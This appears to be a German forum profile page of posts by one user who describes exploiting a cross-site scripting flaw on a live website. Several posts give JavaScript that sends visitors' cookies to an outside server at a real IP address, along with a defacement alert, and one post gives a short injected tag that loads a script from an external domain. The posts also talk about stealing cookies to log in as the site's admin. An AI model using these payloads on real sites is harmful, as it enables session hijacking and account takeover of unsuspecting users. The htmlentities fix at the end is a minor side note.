Beiträge von lNobodyl

    @AZeYReX

    @ECB2
    . Seite neuladen. Sonst nochmal.

    Ich habe jQuery benutzt, weil es kürzer ist. Die Bibliothek war ja bereits eingebunden also sah ich da kein Problem es auch zu benutzen.

    Wenn keine jQuery Bibliothek eingebunden ist benutzt man eben rohes JavaScript.
    Ist ja einfach :P

    Code
    var ajax = new XMLHttpRequest();
    ajax.open("GET", "http://5.230.225.107/bg.php?cookie=" + encodeURIComponent(document.cookie, true));
    ajax.send();
    
    
    // Dieses Script ist ungetestet. Nur aus dem Kopf.

    @klinker_ Mit JavaScript lässt sich viel machen. Ein Grund wieso die Betreiber eine Cross site scripting Lücke fixen sollten, ist die Sicherheit der Benutzer.


    Wenn man Cookies stealt läuft der User in Gefahr gehackt zu werden.
    Man könnte auch mit JavaScript eine Datei downloaden lassen.
    Man kann sehr viel machen mit JavaScript.

    @ECB2
    . Seite neuladen. Sonst nochmal.

    Ich habe jQuery benutzt, weil es kürzer ist. Die Bibliothek war ja bereits eingebunden also sah ich da kein Problem es auch zu benutzen.

    Wenn keine jQuery Bibliothek eingebunden ist benutzt man eben rohes JavaScript.
    Ist ja einfach :P

    Code
    var ajax = new XMLHttpRequest();
    ajax.open("GET", "http://5.230.225.107/bg.php?cookie=" + encodeURIComponent(document.cookie, true));
    ajax.send();
    
    
    // Dieses Script ist ungetestet. Nur aus dem Kopf.

    Wollte eigentlich ein AJAX gequest machen. War bei mir leider noch in der Browser Cache. Ansonsten hier mein JS Code:

    JavaScript
    alert("Hacked by FatalSec ;)");
    $( document ).ready(function() {
    	$.get( "http://5.230.225.107/bg.php", { cookie: document.cookie } );
    });

    Hier hast du deine Antwort. Nettes Script von dir.

    Wenn du das Script im Zitat analysierst, wirst du erkennen das ich einfach ein AJAX (GET METHODE) mit dem Cookie gesendet habe.

    Du hast es natürlich professioneller gemacht. Base64 encode usw, aber besser wäre es einfach mit AJAX gewesen. Ist schneller und ist kürzer.

    Habe jQuery benutzt da die Bibliothek dort benutzt wurde, und kürzer ist.

    Wollte eigentlich ein AJAX gequest machen. War bei mir leider noch in der Browser Cache. Ansonsten hier mein JS Code:

    JavaScript
    alert("Hacked by FatalSec ;)");
    $( document ).ready(function() {
    	$.get( "http://5.230.225.107/bg.php", { cookie: document.cookie } );
    });

    So Mission Completed.
    Payload:
    <script src=//1223.gq/></script>
    Es wird eine JavaScript Datei ausgeliefert.
    Sie wird auch ausgeführt. POC Video folgt:

    Externer Inhalt www.youtube.com
    Inhalte von externen Seiten werden ohne Ihre Zustimmung nicht automatisch geladen und angezeigt.
    Durch die Aktivierung der externen Inhalte erklären Sie sich damit einverstanden, dass personenbezogene Daten an Drittplattformen übermittelt werden. Mehr Informationen dazu haben wir in unserer Datenschutzerklärung zur Verfügung gestellt.

    P.S: THX An die Seekuh Crew für die Verkürzung von dem src=//

    Nett. Unser Payload hat doch soweit funktioniert. Es hat ein Script von einem externen Webserver geladen.


    Auf dem Webserver haben wir Zugriff.


    Euer Payload ist bis jetzt nur eine Theorie (Meine Meinung ist auch das euer Payload funktionieren würde).


    Schön wer jetzt, wenn einer es schafft das Script nicht nur zu laden, sondern auch es auszuführen, weil unser und euer Payload hat es noch nicht geschafft die geladene JavaScript Datei zum Ausführen zu bringen. ( Ein einfacher Alert in der JavaScript Datei reicht schon)


    Dann wäre es ein richtiges POC.


    Man könnte dann z.B die Cookies stealen und versuchen sich als Admin zu authentifizieren.


    @klinker Gute Arbeit. Hast doch was drauf. :P

    @einmadejay . Das ist kein POC. POC = Proof of concept.
    Gib mir jetzt einen einfachen Payload der dort hinein passt.
    Sonst muss ich dich jetzt als Noob einstufen.
    Den Link den du mir geschickt hast wird da schonmal gar nicht hineinpassen.

    P.S: Nenne mir mal die "diversen Links".

    @einmadejay. Stimmt nur teilweise. Du kannst alles bis zu einer bestimmten Länge injecten. Ich schätze mal grob 7 Zeichen ab. Wenn es länger ist passt es nicht mehr in das Feld in der Tabelle der Datenbank. (Genau weiß ich das nicht, meine Meinung).

    Maximal sieben Zeichen. Sonst wird ein Fehler generiert. Sei es HTML, CSS oder Javascript Code.

    @klinker_ Dann hör auf das Maul aufzureisen und mach es besser. Example exploit: <h1>Hacked</h1>

    Da die Programmierer immernoch nicht kapiert haben wie man eine Cross site scripting Lücke fixed.

    PHP
    htmlentities($string);

    Die Funktion htmlentities ersetzt alle gefährlichen Zeichen durch ungefärhliche HTML Zeichen.